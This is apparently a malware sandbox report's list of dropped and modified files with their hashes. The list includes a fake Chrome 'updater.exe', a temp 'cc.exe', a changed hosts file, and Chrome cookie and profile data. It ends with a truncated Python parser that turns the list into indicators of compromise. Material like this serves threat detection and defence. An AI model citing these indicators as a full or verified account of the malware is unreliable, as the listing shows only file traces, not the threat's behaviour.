C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 8bbc60b19f1ddc47d63658f713af1d4d
SHA1 d85aadafd31b766ba4ec615b852c8441759a93b7
SHA256 29963e27f51a11c65e6c8cd1f432f376983d2fd28fca8d1e43e4b471ea66d190
SHA512 f0a3f3a9f239a7fcbf54216efa98700df919c2ea64394f323dbd8a28e4336e542d3751032dce68f9f007eb51131124be53f1e00c5b49d4aaf438d9b60cbe8f8a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JU68DFTE78MQX3KOWJYT.temp

MD5 8bbc60b19f1ddc47d63658f713af1d4d
SHA1 d85aadafd31b766ba4ec615b852c8441759a93b7
SHA256 29963e27f51a11c65e6c8cd1f432f376983d2fd28fca8d1e43e4b471ea66d190
SHA512 f0a3f3a9f239a7fcbf54216efa98700df919c2ea64394f323dbd8a28e4336e542d3751032dce68f9f007eb51131124be53f1e00c5b49d4aaf438d9b60cbe8f8a

memory/2764-291-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2764-290-0x000000001B390000-0x000000001B672000-memory.dmp

memory/2764-293-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

memory/2764-292-0x0000000002800000-0x0000000002880000-memory.dmp

memory/2764-296-0x0000000002800000-0x0000000002880000-memory.dmp

memory/2764-295-0x0000000002800000-0x0000000002880000-memory.dmp

memory/2764-294-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2764-297-0x0000000002800000-0x0000000002880000-memory.dmp

memory/2764-298-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2688-302-0x00000000777B0000-0x0000000077959000-memory.dmp

memory/2688-303-0x000000013FC90000-0x0000000140EB6000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2940-311-0x000000013F660000-0x0000000140886000-memory.dmp

memory/2188-313-0x00000000777B0000-0x0000000077959000-memory.dmp

memory/2188-315-0x000000013F660000-0x0000000140886000-memory.dmp

memory/2940-318-0x000000013F660000-0x0000000140886000-memory.dmp

memory/2188-319-0x00000000777B0000-0x0000000077959000-memory.dmp

memory/2188-320-0x000000013F660000-0x0000000140886000-memory.dmp

memory/1368-322-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

memory/1368-323-0x00000000011D0000-0x0000000001250000-memory.dmp

memory/1368-324-0x00000000011D0000-0x0000000001250000-memory.dmp

memory/1368-325-0x00000000011D0000-0x0000000001250000-memory.dmp

memory/1368-326-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

memory/1368-327-0x00000000011D0000-0x0000000001250000-memory.dmp

memory/1368-328-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

memory/2216-331-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp

memory/2216-333-0x0000000000D90000-0x0000000000E10000-memory.dmp

memory/2216-334-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp

memory/2216-335-0x0000000000D90000-0x0000000000E10000-memory.dmp

memory/2216-336-0x0000000000D90000-0x0000000000E10000-memory.dmp

\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2216-344-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp

memory/3020-343-0x000000000DC10000-0x000000000E244000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2084-348-0x0000000001280000-0x00000000018B4000-memory.dmp

memory/2084-350-0x00000000779A0000-0x00000000779A2000-memory.dmp

memory/3020-351-0x00000000745C0000-0x0000000074CAE000-memory.dmp

memory/3020-352-0x0000000002430000-0x0000000002530000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Local State

MD5 e1352a1843a2207a76a6b367462324a1
SHA1 d67a75167db929373d0832dff6dd5e5d9afeebd5
SHA256 aa4327615127d2875f9b35542ce3ec2dc17a574d3308c3f6db36fefae3923095
SHA512 5daf17ee5be47424a242d91ab818d76089eb90f9802277567dc1c6aae9ccfa4ccb8d29a94980a24ab7b55b7dfbddf2e93557e5846d3d97a197c5a50d98cea40d

\??\pipe\crashpad_1600_CSYFLYOJSLOXZLWK

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Local Storage\leveldb\MANIFEST-000004

MD5 031d6d1e28fe41a9bdcbd8a21da92df1
SHA1 38cee81cb035a60a23d6e045e5d72116f2a58683
SHA256 b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da
SHA512 e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Local Storage\leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Local Storage\leveldb\LOG

MD5 61acd27e7dd0a4cfbff28852af82fed9
SHA1 46872b46d13370d12472874f1e1a1f63e1bcd2bc
SHA256 6130d0f7969b9fcc6c39c223901fdafad3a6b52c7f1ea2a963238ba1998a5976
SHA512 44112ca747835bd1c2202787f80839f0290ab2c19456ada58963ad73ad016cc0ff4db4edcd3b94da64af3ae2846b3d6068ac840502b63346d31eaf12f651bf37

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Local Storage\leveldb\LOG.old

MD5 9a5fa3edd2c2af71986199fe74033097
SHA1 b4516b6b87ef5387d4bbb585c883cec7fa48c44c
SHA256 c352e18654165e2cdbf584baebf798bbcdd0ae021121a23d89c9a49137782b96
SHA512 c3f06507d460b07215b8881ac0c1f9ac1753ec831446ac236257ab2e0027ed5523549ed9c7b9e51ca945404fde31b5dc36ab114509873cf69760378172879811

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Session Storage\CURRENT~RFf784431.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\index-dir\the-real-index

MD5 60b02ee1e879f52bfde800a394222811
SHA1 74639ac5dec19e2395de2bcf135b112ed085c9ee
SHA256 350faf089ff12ecf4afef63888b61fa892a3c4faf26005b8e6f3ca24f3fec31d
SHA512 4b2b89b517df0c318e526e5b2041b4e11818d0a7814ba1c534767e36fe0ee2e856f4fb110ba95fc62698d7015b951545cb537b71d2d935e6fa7bdd2907c2cc08

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\data_2

MD5 4489eabf6d1dffb9fe31a5ade421dc8a
SHA1 bc03f37467d4e1b94e00a078a18f95a49420fe89
SHA256 a4448506f94cacf339541f2b6ae2c7c53783cd13a526473ab43586e895ed6ee7
SHA512 181f3336fbf364add21bf07216c2073f89f16c9bd824a8a51dafa2ca9f3e3f7b8c537cb87a41ba4c22cd009fdf0bd34803f8527597a1e68b05ab6d331acc5117

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\data_1

MD5 d667a2c6d8f2711dc792d8cfdfa9f6c8
SHA1 370b176d2434300e7e14579fdab7a73909f2ca53
SHA256 eb7154eab6ff30f015af85b47e5eab6f3a402228fee11883a88df564b01d9040
SHA512 c9cd43df61c5146b28352830106629e9bd15ade691bafbb88621b61518be61daa99ff8ad5c4c8cfaf07c45a8fd5bb9ab3236acd1f559b73c0b7ce7e4bf138c1f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Crashpad\settings.dat

MD5 97fa42331319da652d96e2ec7bf0fc8b
SHA1 6c463ffd8117a61dbd63be0b807ba72deb54f3be
SHA256 8dcf05ad2d66efc6c61240a8baea0ab1bb3669cb3fc322078f651fcf7ce6f61f
SHA512 3680a3294f1ea1c8366d7edf863d911dd2d019f3d93e3ef4831e84ac3e73f9d2accde14eecaeee38125117083ca58be69dcad1ed17e9a086cbc37ad5db924dfb

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\DevToolsActivePort

MD5 56953ee53cff903696a42aed4b1bd507
SHA1 e5adb5470ddf76a17d2a0034253dbcfb97a49932
SHA256 80883f6bfdcfb328373b55c7cc38ebde5fc100aa0fb5853cf187fc5959655c84
SHA512 1e88081fbf2eccf9de8d2fad549d6a1c192a37b3de841715da0b2097c2d7953afdc95ed04f856f4ebb3c9beca889d84d8e2f6410878e47a6e28f74bd9463fe24

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\data_0

MD5 3175d61dfb97ca4c924be3c002110ebf
SHA1 11e4c99b982af88f65aae5e9cb856df2360edd7a
SHA256 74110f7345b8392a5df42f1da45e6f10d1d80fe6d18371872f18dce4cfb7e75b
SHA512 9fb1203f5b242083a2491dd2c7b27430c459cd8f80860d2c625f5aa0ec8130ab017c6913fac8726aa4ee12abf5aa507b9826f8ff5f14038f97a73a11bcc22607

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\64961e4faf967aa0_0

MD5 78ebc92eec65789070235669133fabbf
SHA1 8dbca4a8f025c46e74586e3cd40b9212e2f8282f
SHA256 d41a5bda824d41c807f32f351d1acc6d9f265463217b0effab778a8f7bf1914e
SHA512 9f7b1e2687073fbec32058fcc3d29732a2e597f89f39b086c9bff2431e2b004acfb759f5a9493b22b3f9b856b4391fb6d7fcfb82e4131141e84e8f657a65fd90

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\61d62438b0793205_0

MD5 cd50e7ca5e640f4b5652ba19cb7a9424
SHA1 d6e5e557647b941bcb7399def90fe2d1eeae5847
SHA256 1824cf1a864aa945346a339a892e1e787ed8f007999123d4ecb8991a0500aee3
SHA512 365b83686663258c5a1af63a46d6c6fdedb4b82f96b6b78aff0aeeef5769650782233d821441ce75d5991c17dab4238265c32dea6af022e8091156322436ddb3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\6197134d877c05b7_0

MD5 4e56befe7592cec579ec2fa55ab09f8d
SHA1 cacd5661d466d4305580e23bfd21ada33a72523b
SHA256 600d6b267f1c6c6218cdb733aa50fdfa6b4c80529d8bddb77a16fdc61b85fb15
SHA512 9b775559f75d0c6557669dc453d2d6b6d6ac0e17af4986ac4378359bf30cac4afd5eb7e582e996f92c8d67be2ddef345e8f09aa4e3c72b19c2dbaf72b555d41f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\60ae0d0fe9088cac_0

MD5 0405a52fd02445f5cf9f508fc12950cc
SHA1 1547bd289722b1f5e63c3b8d6cf441660d29470b
SHA256 fc4b3ba528e749c2b57186597dad1d5bc92fc7296fc1e560b4ae5f649eb1774d
SHA512 ec1e1c341d1b359a63be1e5b435413089dbf244056b871937dfe1893a04a82a21197a2d942d1325dabbcecc7f0cd33f4f94891c46ce5fc03bce4eb3683af838c

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\5b76df05a935e848_0

MD5 398910d7aec1c70c86cdb5b5b1e3d28e
SHA1 f80cb853b9e992ff5e6a911e165a8a3c17fcb040
SHA256 ef0f0fc108b549f4bb23e6e7279a056bf8a5d915e6e69d793513dc39796d936a
SHA512 d4f055e96cd2ad0cd27f6c94d117a738c4a5f49e7ca3f2894a8bc666f94f8cf2017a360ce35ede7072e45466ead7461fb57ff601b93e946cbb5d37bf41fbeef8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\5003563973751d44_0

MD5 5feae9c14f935e81e41cc3a1ebddc8d0
SHA1 783ec60b097e649437cc2601d3437f9bcbb02dd5
SHA256 54bdf3d18bb20706a9ac95d31b066491bdf5bfd52de8e40d3e4e98ba47d91942
SHA512 d18ffcfc297195640c068497d348600dea579b8c59c967c6f77342670f8849715a5182725a7ef8871afee6616a3656e3b50978ed6f3acd09b3d72c22641fa025

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\343f6993e27f1d39_0

MD5 bda629b5b8891544c865a07fb98c52e7
SHA1 d5db6df8944a87b439fcb105e241facc50e70f47
SHA256 926b4185c760fed83e3d68b9adee9564dd0722e73abe1881d0bbab75e4c7945b
SHA512 7041ab9123e623bb17fb0415d0151c07c8d76c606a6c2d8b318a496f0a80a1a2831bd3d0ef4be5e690605bd6213b04a752f6b10b33d883b9a908237c8afacaa5

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\2e64514b9cd267ab_0

MD5 58113d55fbf2abb33f03d9afd8347724
SHA1 8d330e3b2fae4ea3c401c5891a6d45165b4ebcda
SHA256 ba37b8e91c5c8f07e83fd8473c6179aa9d831db5028f37b7822fef193d73a3b6
SHA512 e5820d3cfe6ee2ebc7bd15410ac3e6cb001c5010bb40c27199a9a48fdecb418da226c2e27ba4070dbacf144255820621c59d2e817fa706ccc7a488522a8cfb68

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\2ca80a621de666cd_0

MD5 63e23af767b44367f9b4f612c30f69fc
SHA1 481a3820b40f1c505d4d9b025b43ca9c856014d9
SHA256 17d3178733fa04f64d71fb9c576a7a8b5d5c36b5b4088281196c58ff63e90d17
SHA512 7f5440945f6c9a735d97c68875c205369c0a4ccae9ec6d29fe1a22a4342938c6c7d6156b242f463458a621706bf1b1c9deba4125f63f519049d22161cbec798c

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\23c05bba7a1589a0_0

MD5 27e9435dc695a5a8bdd7358c97cd86e1
SHA1 76ea3947d0efb54e2249bebf68ea4de5d7a26910
SHA256 3d05efb96fdc669b147b645f1ed6e80cf320527c32554f5472a46c9e23815ecf
SHA512 b49bfa9b6a1b7e20fef0ad460ac68685f1c3fe469bd11716eab93cc3f3c3aca603d5aa810b73b5fca1c113a17b3da7465238790af2cacbcd3e654b3dc91cc2cb

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\06db5837b6c74111_0

MD5 3986187d343607ef87c950ac4e5724ac
SHA1 0a6257fe5a625f0f3937570b05dfa85f25385b30
SHA256 665a63219f92ed9f432692c6b319ca5064faecc44ed23706d2af07e6add85d5c
SHA512 4a086a06499e5da74de261cd6d398668464b8fdde027642c7d7d90bb03ca47342fe6c9e3066d7fd2be75c7c806adb988b0b9cea4a7fa85ea04d90b770bb91bc4

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\index

MD5 4064a81a68402f21d9acd6d0a5c7611c
SHA1 41045a3d54dcda794b8db2f12fc962a67e1c1c79
SHA256 8eac7da02081d1127ed9b7d471ade58dd642e5a53d7ecdb8ea4cbf0e20dbbea3
SHA512 19cf0257d6e62fd76610ca9f50cba94a89dd839e4032edf8d3b1261a8c62ddb0414d407ed2dbab23b67a6ce68d8394eeb774630f0e908c38d8befcb55c4b06b4

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_00000c

MD5 ccd8fdb35b360d667aabd139cf2f763d
SHA1 249cb9ff5099f07f488b4d5429634fe8a8ca6ea8
SHA256 8ed710089acb08631c28bdfcef5628a616b3a65e88372fd63977d0fbda249f1f
SHA512 b2feafbcc91a712fcce214212e57ce8a22b0badad52ae3e05947715828769188a46a5fcfd76eb8641087529e560b4b0b953e456bf58e4e46f0c5f67a6debbebe

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_00000b

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_00000a

MD5 2d52125a96fb5a7227c67848bc18f65c
SHA1 a3593c6d8e3b6b458b6bbc2c6423dc76e30a84a3
SHA256 61f3154c19e46e1989d6fadbfe20835d0c9fc47242dc5828e776e3ec667fda24
SHA512 5f151708007cb474e64e8968b1f6b5e5331c434cc237627c6c5c92d1894d020f476ad88461e35fbf383aa46750a9cdcaf3a2ac8fe90570753c73fcf17ac0cbe6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000009

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000008

MD5 c101a8ba729b894927d7d884e4be68a8
SHA1 4bf48f94ff4e50e81c9d83b641af74b3bed580a0
SHA256 544f08482a62485be4acbc443462b01fe16b408b3d154c0cb1ff921a453cee33
SHA512 77483a92abeed799dfb1e782988569875b29eccebfb14e5be353302849ea6f0ac6a6411a72d6da706ec3767a54f12907fd0bfa4646ad4ca1cf4e1e15fbe9a9ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000007

MD5 6a3bb9c5ba28ee73af6c1b53e281b0cf
SHA1 d96e403c99c1707f82ea29c2c1f134e792c64097
SHA256 2f5adfc38558162578ffe112229f10417fbc4b3df025d153d4e22a0c95177740
SHA512 6c4844f70969938339cb6716a834a79e1a8379459c87b983c2518b9cbb560cb2f101aff980f682989928523be6cdc99bde3bfd8137f9c54a58191b900b580fbf

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000006

MD5 d9ac252543e19a234db5a147e3ffc639
SHA1 560c646702aba6cb635128b1e4e3fb78c62fcb67
SHA256 4aace29b44cad685519cd859721c4bfb9790a4a64eb8e32e40ca58491d67713b
SHA512 4608012cbafce38231dd4d51ece0d565001ba3490831dcb2909522d91dec0fe712b43a66c4f9e8063db773453a2f8993bb5d1a9e83cc7f7d2b3ee1f4e96addc9

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000005

MD5 d4898b52a84026a5022200fbaa820c65
SHA1 791409e8c187418be773aa7f589a2c8e52c41ce0
SHA256 6e6f37d4f8892d41b4b850bc7753f84da6f73d833636125df25ca7bd4c86775f
SHA512 1480c1055eb8efe74645942e087c35d7c0cb5239bc53b350f19e278e5a2522607025cf9dc5c8d30c76e102fc15edb768fa99c9298b77050664fa9520324cff23

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000004

MD5 3cc207ec29df84cc9c7bb2f8597c5adf
SHA1 b2727aa32e5775cb770e86e0e032468f5756c324
SHA256 17b71418c324214cd860964bbfa7bf41a083bbc4239ef7ea47e48bb370cf20ed
SHA512 af86dcf56fe69da703ad2280da6e998219e34b0da8564b82009fd993f8c80d7675bec3c80ca136722845bfb3f7e526c46154a69099c7bbb9bac141504de461ce

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000003

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000002

MD5 dc1a475aad930bc6bdee639ba2df283b
SHA1 7fd6b05e23175d282b56b84c90daa6b6b9426fc8
SHA256 4bb0d3921522a05875a11207eb489a2aacce7be42a22b0c833139b210b522f96
SHA512 b1f3e669034a6071f11514f63956292dc5fc20a41bb5d8ba9997836dd69e815ee773d93dc804e130edff5b6a10ed9c7c3a1cf8e37a1740ff03d05b95c5d91f56

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\data_3

MD5 eb4975310dcf49f59ffeaf60f80a2dcd
SHA1 b3bf51783b569c5179b798377d56a43f64602dc6
SHA256 534b3b55e158902a17aa1f640678d0a9be5d60d281c8aa0a0ca476dfcecf0ceb
SHA512 d4018160ce23f2b8c71a49f531250bc51bae90a20df39960a24104def0909e0a0eb5c917de0bf2d0b489a7eb4636dd9ef971deb44169cafd6ab175799d50e5d3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
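
The Files listing above repeats the same dropped binaries under several path spellings and interleaves memory-dump records, which makes it awkward to turn into an IOC set by hand. The following Python is an added example, not part of the original report or of the sandbox vendor's tooling: it parses that plain-text layout (a path line, then "ALGO hex" hash lines, with memory/<pid>-<seq>-<start>-<end>-memory.dmp lines in between), folds path spellings together, groups entries by SHA256 so that a re-drop under a new name (C:\Windows\Temp\setup.exe written again as C:\Program Files\Google\Chrome\updater.exe) shows as one binary, and discards entries whose hashes are those of zero bytes (the crashpad pipe), which are not usable as hash IOCs. The sample listing is a constructed excerpt with hashes copied from this page (SHA512 lines left out); the assumption that a drive-less path such as \Users\... means C: is marked in the code.

```python
"""Parse the report's Files listing into a deduplicated IOC table.

Added example, not part of the original report. It assumes the plain-text layout
of the listing: a path line, then hash lines of the form '<ALGO> <hex>'
(MD5/SHA1/SHA256/SHA512), with 'memory/<pid>-<seq>-<start>-<end>-memory.dmp'
lines interleaved, and that a path written without a drive letter refers to C:.
"""
import hashlib
import re
from collections import defaultdict

# Constructed excerpt of the listing (hashes copied from the report; SHA512 lines
# omitted). mi.exe appears under two spellings, setup.exe is re-dropped as
# Chrome's "updater.exe", and the crashpad pipe carries the hashes of zero bytes.
SAMPLE_LISTING = r"""
memory/3020-55-0x0000000002430000-0x0000000002530000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93

memory/2688-160-0x000000013FC90000-0x0000000140EB6000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93

C:\Windows\System32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd

\??\pipe\crashpad_1600_CSYFLYOJSLOXZLWK

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
"""

MEMDUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-(?P<start>0x[0-9A-Fa-f]+)-(?P<end>0x[0-9A-Fa-f]+)-memory\.dmp$")
HASH_RE = re.compile(r"^(?P<algo>MD5|SHA1|SHA256|SHA512) (?P<hex>[0-9a-f]+)$")
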